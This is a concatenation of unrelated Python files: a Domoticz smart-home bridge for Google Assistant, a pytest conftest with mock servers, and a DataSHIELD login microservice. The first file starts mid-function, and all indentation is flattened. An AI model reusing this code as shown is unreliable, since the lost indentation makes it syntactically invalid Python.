if varname != "":
if varname in ISLIST:
allvalues = assign[1].split(',')
varvalues = []
for val in allvalues:
varvalues.append(val.strip())
cfgdict[varname] = varvalues
else:
varvalue = assign[1].strip()
if varvalue.lower() == "true":
varvalue = True
elif varvalue.lower() == "false":
varvalue = False
cfgdict[varname] = varvalue
except:
logger.error('Error parsing device configuration from Domoticz device description: %s', rawconfig[0])
return None
return cfgdict
return None
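# Hedged example of the <voicecontrol> block that getDeviceConfig() parses out of
# a Domoticz device description (the device values are assumptions):
#
#   <voicecontrol>
#   nicknames = ceiling lamp, main light
#   room = Living Room
#   ack = true
#   </voicecontrol>
#
# would yield:
#   {'nicknames': ['ceiling lamp', 'main light'], 'room': 'Living Room', 'ack': True}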
def getAog(device):
domain = AogGetDomain(device)
if domain is None:
return None
aog = AogState()
aog.name = device["Name"] # .encode('ascii', 'ignore')
aog.domain = domain
aog.id = device["idx"]
aog.entity_id = domain + aog.id
aog.plan = device.get("PlanID")
aog.state = device.get("Data", "Scene")
aog.level = device.get("LevelInt", 0)
aog.temp = device.get("Temp")
aog.humidity = device.get("Humidity")
aog.setpoint = device.get("SetPoint")
aog.color = device.get("Color")
aog.protected = device.get("Protected")
aog.maxdimlevel = device.get("MaxDimLevel")
aog.seccode = settings.get("SecPassword")
aog.secondelay = settings.get("SecOnDelay")
aog.tempunit = settings.get("TempUnit")
aog.battery = device.get("BatteryLevel")
aog.hardware = device.get("HardwareName")
aog.selectorLevelName = device.get("LevelNames")
aog.language = settings.get("Language")
aog.lastupdate = device.get("LastUpdate")
# Try to get device specific voice control configuration from Domoticz
# Read it from the configuration file if not in Domoticz (for backward compatibility)
desc = getDeviceConfig(device.get("Description"))
if desc is not None:
logger.debug('<voicecontrol> tags found for idx %s in domoticz description.', aog.id)
logger.debug('Device_Config for idx %s will be ignored in config.yaml!', aog.id)
if desc is None:
desc = getDesc(aog)
if desc is not None:
dt = desc.get('devicetype', None)
if dt is not None:
if aog.domain in [domains['blinds']]:
if dt.lower() in ['window', 'gate', 'garage', 'door']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['light'], domains['switch']]:
if dt.lower() in ['window', 'door', 'gate', 'garage', 'light', 'ac_unit', 'bathtub', 'coffemaker', 'dishwasher', 'dryer', 'fan', 'heater', 'kettle', 'media', 'microwave', 'outlet', 'oven', 'speaker', 'switch', 'vacuum', 'washer', 'waterheater']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['door']]:
if dt.lower() in ['window', 'gate', 'garage']:
aog.domain = domains[dt.lower()]
if aog.domain in [domains['selector']]:
if dt.lower() in ['vacuum']:
aog.domain = domains[dt.lower()]
n = desc.get('nicknames', None)
if n is not None:
aog.nicknames = n
r = desc.get('room', None)
if r is not None:
aog.room = r
ack = desc.get('ack', False)
if ack:
aog.ack = ack
report_state = desc.get('report_state', True)
if not ReportState.enable_report_state():
aog.report_state = False
if not report_state:
aog.report_state = report_state
if domains['thermostat'] == aog.domain:
at_idx = desc.get('actual_temp_idx', None)
if at_idx is not None:
aog.actual_temp_idx = at_idx
try:
aog.state = str(aogDevs[domains['temperature'] + at_idx].temp)
aogDevs[domains['temperature'] + at_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug("Merge Error, Can't find temperature device with idx %s", at_idx)
modes_idx = desc.get('selector_modes_idx', None)
if modes_idx is not None:
aog.modes_idx = modes_idx
try:
aog.level = aogDevs[domains['selector'] + modes_idx].level
aog.selectorLevelName = aogDevs[domains['selector'] + modes_idx].selectorLevelName
aogDevs[domains['selector'] + modes_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug("Merge Error, Can't find selector device with idx %s", modes_idx)
if aog.domain in [domains['heater'], domains['kettle'], domains['waterheater'], domains['oven']]:
tc_idx = desc.get('merge_thermo_idx', None)
if tc_idx is not None:
aog.merge_thermo_idx = tc_idx
try:
aog.temp = aogDevs[domains['thermostat'] + tc_idx].state
aog.setpoint = aogDevs[domains['thermostat'] + tc_idx].setpoint
aogDevs[domains['thermostat'] + tc_idx].domain = domains['merged'] + aog.id + ')'
except:
logger.debug("Merge Error, Can't find thermostat device with idx %s", tc_idx)
hide = desc.get('hide', False)
if hide:
aog.domain = domains['hidden']
if aog.domain in [domains['camera']]:
aog.report_state = False
if domains['light'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['fan'] == aog.domain and "Selector" == device["SwitchType"]:
aog.attributes = ATTRS_FANSPEED
if domains['outlet'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['color'] == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if domains['color'] == aog.domain and device["SubType"] in ["RGBWW", "White"]:
aog.attributes = ATTRS_COLOR_TEMP
if domains['thermostat'] == aog.domain and "Thermostat" == device["Type"]:
aog.attributes = ATTRS_THERMSTATSETPOINT
if domains['blinds'] == aog.domain and "Blinds Percentage" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if domains['blinds'] == aog.domain and "Blinds Percentage Inverted" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if domains['vacuum'] == aog.domain and "Selector" == device["SwitchType"]:
aog.attributes = ATTRS_VACCUM_MODES
if aog.room is None:
if aog.domain not in [domains['scene'], domains['group']]:
if aog.plan != "0":
aog.room = getPlans(aog.plan)
return aog
aogDevs = {}
deviceList = {}
def getDevices(devices="all", idx="0"):
global aogDevs
global deviceList
url = ""
if "all" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ALL_DEVICES_URL + configuration['Domoticz'][
'roomplan'] + '&filter=all&used=true'
elif "scene" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_SCENES_URL
elif "id" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ONE_DEVICE_URL + idx
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
devs = r.json()['result']
for d in devs:
aog = getAog(d)
if aog is None:
continue
aogDevs[aog.entity_id] = aog
if 'loglevel' in configuration and (configuration['loglevel']).lower() == 'debug':
req = {aog.name: {}}
req[aog.name]['idx'] = int(aog.id)
req[aog.name]['type'] = aog.domain
req[aog.name]['state'] = aog.state
req[aog.name]['lastupdate'] = aog.lastupdate
if aog.nicknames is not None:
req[aog.name]['nicknames'] = aog.nicknames
if aog.modes_idx is not None:
req[aog.name]['modes_idx'] = aog.modes_idx
if aog.hide is not False:
req[aog.name]['hidden'] = aog.hide
if aog.actual_temp_idx is not None:
req[aog.name]['actual_temp_idx'] = aog.actual_temp_idx
if aog.merge_thermo_idx is not None:
req[aog.name]['merge_thermo_idx'] = aog.merge_thermo_idx
req[aog.name]['willReportState'] = aog.report_state
logger.debug(json.dumps(req, indent=2, sort_keys=False, ensure_ascii=False))
devlist = [(d.name, int(d.id), d.domain, d.state, d.room, d.nicknames, d.report_state) for d in aogDevs.values()]
devlist.sort(key=takeSecond)
deviceList = json.dumps(devlist)
def takeSecond(elem):
return elem[1]
def deep_update(target, source):
"""Update a nested dictionary with another nested dictionary."""
for key, value in source.items():
if isinstance(value, Mapping):
target[key] = deep_update(target.get(key, {}), value)
else:
target[key] = value
return target
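# Illustrative use of deep_update (a sketch, not part of the original module): nested
# mappings are merged key by key instead of being replaced wholesale, e.g.
#   deep_update({'a': {'x': 1}}, {'a': {'y': 2}, 'b': 3})
#   -> {'a': {'x': 1, 'y': 2}, 'b': 3}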
settings = {}
settings['dzversion'] = "Unavailable"
def getSettings():
"""Get domoticz settings."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_SETTINGS_URL
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
devs = r.json()
settings['SecPassword'] = devs['SecPassword']
settings["SecOnDelay"] = devs["SecOnDelay"]
settings['TempUnit'] = devs['TempUnit']
settings['Language'] = devs['Language']
getVersion()
logger.debug(json.dumps(settings, indent=2, sort_keys=False, ensure_ascii=False))
def getVersion():
"""Get domoticz version."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_VERSION
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
vers = r.json()
settings['dzversion'] = vers['version']
def getPlans(idx):
"""Get domoticz plan name."""
global settings
url = DOMOTICZ_URL + '/json.htm?type=plans&order=name&used=true'
r = requests.get(url, auth=CREDITS)
if r.status_code == 200:
rooms = r.json()['result']
plan = [i for i in rooms if i['idx'] == idx][0]
return plan['Name']
def restartServer():
"""Restart."""
logger.info(' ')
logger.info("Restart server")
logger.info(' ')
pidfile.close()
os.execv(sys.executable, ['python'] + sys.argv)
class _GoogleEntity:
"""Adaptation of Entity expressed in Google's terms."""
def __init__(self, state):
self.state = state
@property
def entity_id(self):
"""Return entity ID."""
return self.state.entity_id
def traits(self):
"""Return traits for entity."""
state = self.state
domain = state.domain
features = state.attributes
t = [Trait(state) for Trait in trait.TRAITS
if Trait.supported(domain, features)]
return t
def sync_serialize(self, agent_user_id):
"""Serialize entity for a SYNC response.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
state = self.state
enableReport = ReportState.enable_report_state()
traits = self.traits()
# Found no supported traits for this entity
if not traits:
return None
if enableReport:
reportState = state.report_state
else:
reportState = enableReport
device = {
'id': state.entity_id,
'name': {
'name': state.name
},
'attributes': {},
'traits': [trait.name for trait in traits],
'willReportState': reportState,
'deviceInfo': {
'manufacturer': "Domoticz",
"model": state.hardware
},
'type': DOMOTICZ_TO_GOOGLE_TYPES[state.domain],
}
# use aliases
aliases = state.nicknames
if aliases:
device['name']['nicknames'] = [state.name] + aliases
for trt in traits:
device['attributes'].update(trt.sync_attributes())
# Add room hint if annotated
room = state.room
if room:
device['roomHint'] = room
return device
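    # Illustrative SYNC entry as built above (shape only; the id, name, traits and type
    # depend on the Domoticz device, so the values here are examples, not real output):
    #   {'id': '<entity_id>', 'name': {'name': 'Kitchen'}, 'attributes': {},
    #    'traits': ['action.devices.traits.OnOff'], 'willReportState': True,
    #    'deviceInfo': {'manufacturer': 'Domoticz', 'model': '<hardware>'},
    #    'type': 'action.devices.types.LIGHT'}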
def query_serialize(self):
"""Serialize entity for a QUERY response.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
state = self.state
# if state.state == STATE_UNAVAILABLE:
# return {'online': False}
attrs = {'online': True}
for trt in self.traits():
deep_update(attrs, trt.query_attributes())
return attrs
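    # Illustrative QUERY state for a dimmable light (the attribute names come from the
    # device's traits; the values here are examples only):
    #   {'online': True, 'on': True, 'brightness': 70}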
def execute(self, command, params, challenge):
"""Execute a command.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
executed = False
for trt in self.traits():
if trt.can_execute(command, params):
acknowledge = self.state.ack # ack is now stored in state
pincode = False
if configuration['Domoticz']['switchProtectionPass']:
protect = self.state.protected
else:
protect = False
if protect or self.state.domain == domains['security']:
pincode = configuration['Domoticz']['switchProtectionPass']
if self.state.domain == domains['security']:
pincode = self.state.seccode
acknowledge = False
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'pinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('pin', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif True == protect and pincode != challenge.get('pin'):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif self.state.domain == domains['security'] and pincode != hashlib.md5(
str.encode(challenge.get('pin'))).hexdigest():
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
if acknowledge:
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'ackNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('ack', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
trt.execute(command, params)
executed = True
break
if not executed:
raise SmartHomeError(ERR_FUNCTION_NOT_SUPPORTED,
'Unable to execute {} for {}'.format(command, self.state.entity_id))
def async_update(self):
"""Update the entity with latest info from Domoticz."""
if self.state.domain == domains['group'] or self.state.domain == domains['scene']:
getDevices('scene')
else:
getDevices('id', self.state.id)
class SmartHomeReqHandler(OAuthReqHandler):
global smarthomeControlMappings
global aogDevs
def __init__(self, *args, **kwargs):
super(SmartHomeReqHandler, self).__init__(*args, **kwargs)
self._request_id = None
def report_state(self, states, token):
"""Send a state report to Google."""
data = {
'requestId': self._request_id,
'agentUserId': token.get('userAgentId', None),
'payload': {
'devices': {
'states': states,
}
}
}
ReportState.call_homegraph_api(REPORT_STATE_BASE_URL, data)
def smarthome_process(self, message, token):
request_id = self._request_id # type: str
inputs = message.get('inputs') # type: list
if len(inputs) != 1:
return {
'requestId': request_id,
'payload': {'errorCode': ERR_PROTOCOL_ERROR}
}
handler = smarthomeControlMappings.get(inputs[0].get('intent'))
if handler is None:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
try:
result = handler(self, inputs[0].get('payload'), token)
return {'requestId': request_id, 'payload': result}
except SmartHomeError as err:
return {'requestId': request_id, 'payload': {'errorCode': err.code}}
except Exception as e:
logger.error(e)
return {'requestId': request_id, 'payload': {'errorCode': ERR_UNKNOWN_ERROR}}
def smarthome_post(self, s):
logger.debug(s.headers)
a = s.headers.get('Authorization', None)
token = None
if a is not None:
types, tokenH = a.split()
if types.lower() == 'bearer':
token = Auth['tokens'].get(tokenH, None)
if token is None:
raise SmartHomeError(ERR_PROTOCOL_ERROR, 'not authorized access!!')
message = json.loads(s.body)
self._request_id = message.get('requestId')
logger.info("Request " + json.dumps(message, indent=2, sort_keys=True, ensure_ascii=False))
response = self.smarthome_process(message, token)
try:
if 'errorCode' in response['payload']:
logger.error('Error handling message %s: %s' % (message, response['payload']))
except:
pass
s.send_json(200, json.dumps(response, ensure_ascii=False).encode('utf-8'), True)
def smarthome(self, s):
s.send_message(500, "not supported")
def forceDevicesSync(self):
userAgent = self.getUserAgent()
enableReport = ReportState.enable_report_state()
if userAgent is None:
return 500 # internal error
data = {"agentUserId": userAgent}
if enableReport:
r = ReportState.call_homegraph_api(REQUEST_SYNC_BASE_URL, data)
elif 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE':
r = ReportState.call_homegraph_api_key(REQUEST_SYNC_BASE_URL, data)
else:
logger.error("No configuration for request_sync available")
return r
def syncDevices(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('sync'))
return
r = self.forceDevicesSync()
s.send_message(200, 'Synchronization request sent, status_code: ' + str(r))
def restartServer(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('restart'))
return
s.send_message(200, 'Restart request sent, status_code: True')
restartServer()
def settings(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('settings'))
return
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
message = ''
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
def settings_post(self, s):
enableReport = ReportState.enable_report_state()
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
if s.form.get("save"):
textToSave = s.form.get("save", None)
codeToSave = textToSave.replace("+", " ")
saveFile(CONFIGFILE, codeToSave)
message = 'Config saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("backup"):
codeToSave = readFile(os.path.join(FILE_DIR, CONFIGFILE))
saveFile('config/config.yaml.bak', codeToSave)
message = 'Backup saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("restart"):
message = 'Restart Server, please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
code = ''
logs = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
restartServer()
if s.form.get("sync"):
            if ('Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE') or enableReport:
                r = self.forceDevicesSync()
                time.sleep(0.5)
                if r:
                    message = 'Devices synchronized'
                else:
                    message = 'Homegraph API key not valid!'
            else:
                message = 'Add a Homegraph API key or a Homegraph Service Account json file to sync devices here!'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("reload"):
message = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("deletelogs"):
logfile = os.path.join(logfilepath, LOGFILE)
if os.path.exists(logfile):
f = open(logfile, 'w')
f.close()
logger.info('Logs removed by user')
message = 'Logs removed'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
if s.form.get("update"):
repo.git.reset('--hard')
repo.remotes.origin.pull()
message = 'Updating to latest ' + branch + ', please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update,
branch=branch, dzversion=settings['dzversion'])
s.send_message(200, template)
subprocess.call(['pip', 'install','-r', os.path.join(FILE_DIR, 'requirements/pip-requirements.txt')])
restartServer()
def delay_report_state(self, states, token):
time.sleep(3)
self.report_state(states, token)
def smarthome_sync(self, payload, token):
"""Handle action.devices.SYNC request.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
devices = []
states = {}
aogDevs.clear()
getDevices() # sync all devices
getSettings()
enableReport = ReportState.enable_report_state()
agent_user_id = token.get('userAgentId', None)
for state in aogDevs.values():
entity = _GoogleEntity(state)
serialized = entity.sync_serialize(agent_user_id)
if serialized is None:
continue
devices.append(serialized)
if state.report_state:
try:
states[entity.entity_id] = entity.query_serialize()
except:
continue
if enableReport:
            # Thread.start() returns None, so start the thread without the pointless assignment
            threading.Thread(target=self.delay_report_state, args=(states, token)).start()
response = {'agentUserId': agent_user_id, 'devices': devices}
return response
def smarthome_query(self, payload, token):
"""Handle action.devices.QUERY request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
enableReport = ReportState.enable_report_state()
response = {}
devices = {}
getDevices()
for device in payload.get('devices', []):
devid = device['id']
#_GoogleEntity(aogDevs.get(devid, None)).async_update()
state = aogDevs.get(devid, None)
if not state:
# If we can't find a state, the device is offline
devices[devid] = {'online': False}
continue
e = _GoogleEntity(state)
devices[devid] = e.query_serialize()
response = {'devices': devices}
logger.info("Response " + json.dumps(response, indent=2, sort_keys=True, ensure_ascii=False))
        # Guard against an empty device list or an offline last device before reporting state
        if enableReport and devices and state is not None and state.report_state:
            self.report_state(devices, token)
return {'devices': devices}
def smarthome_exec(self, payload, token):
"""Handle action.devices.EXECUTE request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
entities = {}
results = {}
for command in payload['commands']:
for device, execution in product(command['devices'],
command['execution']):
entity_id = device['id']
# Happens if error occurred. Skip entity for further processing
if entity_id in results:
continue
if entity_id not in entities:
if len(aogDevs) == 0:
getDevices()
getSettings()
state = aogDevs.get(entity_id, None)
if state is None:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': ERR_DEVICE_OFFLINE}
continue
entities[entity_id] = _GoogleEntity(state)
try:
entities[entity_id].execute(execution['command'], execution.get('params', {}),
execution.get('challenge', None))
except SmartHomeError as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code}
logger.error(err)
except SmartHomeErrorNoChallenge as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code,
'challengeNeeded': {'type': err.desc}}
logger.error(err)
final_results = list(results.values())
for entity in entities.values():
if entity.entity_id in results:
continue
entity.async_update()
final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': entity.query_serialize()})
return {'commands': final_results}
def smarthome_disconnect(self, payload, token):
"""Handle action.devices.DISCONNECT request.
https://developers.google.com/assistant/smarthome/develop/process-intents#DISCONNECT
"""
return None
if 'userinterface' in configuration and configuration['userinterface']:
smarthomeGetMappings = {"/gapi/smarthome": SmartHomeReqHandler.smarthome,
"/gapi/sync": SmartHomeReqHandler.syncDevices,
"/settings": SmartHomeReqHandler.settings,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/gapi/smarthome": SmartHomeReqHandler.smarthome_post,
"/settings": SmartHomeReqHandler.settings_post}
else:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post}
smarthomeControlMappings = {'action.devices.SYNC': SmartHomeReqHandler.smarthome_sync,
'action.devices.QUERY': SmartHomeReqHandler.smarthome_query,
'action.devices.EXECUTE': SmartHomeReqHandler.smarthome_exec,
'action.devices.DISCONNECT': SmartHomeReqHandler.smarthome_disconnect}
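# Illustrative request body routed through smarthomeControlMappings by smarthome_process
# (shape only; requestId and payload contents vary per intent):
#   {"requestId": "ff36a3cc-ec34-11e6-b1a0-64510650abcf",
#    "inputs": [{"intent": "action.devices.SYNC"}]}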
|
conftest.py
|
try:
from http import server
except ImportError:
import BaseHTTPServer as server
import socket
import threading
import pytest
from tests.servers import login_server as login_mock
from tests.servers import api_server as api_mock
@pytest.fixture(scope="session")
def login_server_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
@pytest.fixture(scope="session")
def login_server(login_server_port):
mock_server = server.HTTPServer(
("localhost", login_server_port), login_mock.MockLoginServer
)
mock_server_thread = threading.Thread(target=mock_server.serve_forever)
    mock_server_thread.daemon = True
mock_server_thread.start()
return mock_server
@pytest.fixture(scope="session")
def api_server_port():
s = socket.socket(socket.AF_INET, type=socket.SOCK_STREAM)
s.bind(("localhost", 0))
address, port = s.getsockname()
s.close()
return port
@pytest.fixture(scope="session")
def api_server(api_server_port):
mock_server = server.HTTPServer(
("localhost", api_server_port), api_mock.MockApiServer
)
mock_server_thread = threading.Thread(target=mock_server.serve_forever)
    mock_server_thread.daemon = True
mock_server_thread.start()
return mock_server
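# Example usage (a sketch, not part of the original fixtures): a test can request the
# fixtures above to get a throwaway HTTP server bound to a free local port. The request
# path and accepted status codes below are assumptions that depend on the handlers in
# tests/servers/api_server.py.
#
#   import requests
#
#   def test_api_server_is_reachable(api_server, api_server_port):
#       response = requests.get("http://localhost:{}/".format(api_server_port))
#       assert response.status_code in (200, 404)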
|
login.py
|
import uuid as _uuid
from threading import Thread
import importlib.util
from pathlib import Path
import rpy2
import rpy2.rinterface
import rpy2.rinterface_lib
from rpy2.robjects.packages import importr
from rpy2.robjects import r
import fdrtd.server
from fdrtd.server.microservice import Microservice
try:
from fdrtd.plugins.protocol_DataSHIELD.src import helpers
except ImportError:
spec_helpers = importlib.util.spec_from_file_location('helpers', Path(__file__).resolve().parent / 'helpers.py')
helpers = importlib.util.module_from_spec(spec_helpers)
spec_helpers.loader.exec_module(helpers)
consolewrite_warnerror_backup = rpy2.rinterface_lib.callbacks.consolewrite_warnerror
consolewrite_print_backup = rpy2.rinterface_lib.callbacks.consolewrite_print
base = importr('base')
DSI = importr('DSI')
DSOpal = importr('DSOpal')
dsBaseClient = importr('dsBaseClient')
grDevices = importr('grDevices')
jsonlite_R = importr('jsonlite')
class Login(Microservice):
def __init__(self, bus, endpoint):
super().__init__(bus, endpoint)
self.storage = {}
self.connection_callbacks_storage = {}
def login(self, list_of_servers, parameters=None, **kwargs):
if parameters is None:
parameters = {}
parameters.update(kwargs)
uuid = str(_uuid.uuid4())
self.storage[uuid] = {'warnerror': [], 'print': [], 'busy': True}
Thread(target=self.login_helper, args=(uuid, list_of_servers, parameters), daemon=True).start()
return self.callback(uuid)
def login_helper(self, uuid, list_of_servers, parameters):
rpy2.rinterface_lib.callbacks.consolewrite_warnerror = lambda e: self.storage[uuid]['warnerror'].append(e)
rpy2.rinterface_lib.callbacks.consolewrite_print = lambda e: self.storage[uuid]['print'].append(e)
builder = r('builder%s <- DSI::newDSLoginBuilder()' % uuid.replace('-', ''))
for server in list_of_servers:
try:
builder['append'](**server)
except Exception as err:
self.storage[uuid]['busy'] = False
raise helpers.handle_error(str(err), 'login')
try:
connection = r('connections%s <- DSI::datashield.login(%s)'
% (uuid.replace('-', ''), helpers.login_params_string_builder(parameters, uuid)))
except Exception as err:
self.storage[uuid]['busy'] = False
raise helpers.handle_error(str(err), 'login')
self.storage[uuid]['busy'] = False
connection_microservice_uuid = self.bus.select_microservice(
requirements={'protocol': 'DataSHIELD', 'microservice': 'connection'}
)
self.connection_callbacks_storage[uuid] = self.bus.call_microservice(
handle=connection_microservice_uuid,
function='connect',
parameters={'connection': connection, 'uuid': uuid}
)
return None
def get_status(self, callback):
try:
return self.storage[callback]
except KeyError:
raise fdrtd.server.exceptions.InvalidParameter(f'uuid {callback}', 'not found')
def get_result(self, callback):
try:
return self.connection_callbacks_storage[callback]
except KeyError:
            raise fdrtd.server.exceptions.InvalidParameter(f'uuid {callback}', 'not found')
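# Example call (a sketch, not part of the original module): each entry in list_of_servers
# is forwarded to DSI::newDSLoginBuilder()$append(), so the keys mirror that R API; the
# server name, URL and credentials below are placeholders.
#
#   login_service = Login(bus, endpoint)
#   login_service.login(list_of_servers=[{
#       'server': 'study1',
#       'url': 'https://opal.example.org',
#       'user': 'dsuser',
#       'password': 'secret',
#   }])
#   # login() starts a background thread and returns via Microservice.callback();
#   # get_status(<login uuid>) exposes the captured R console output and the busy flag.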
|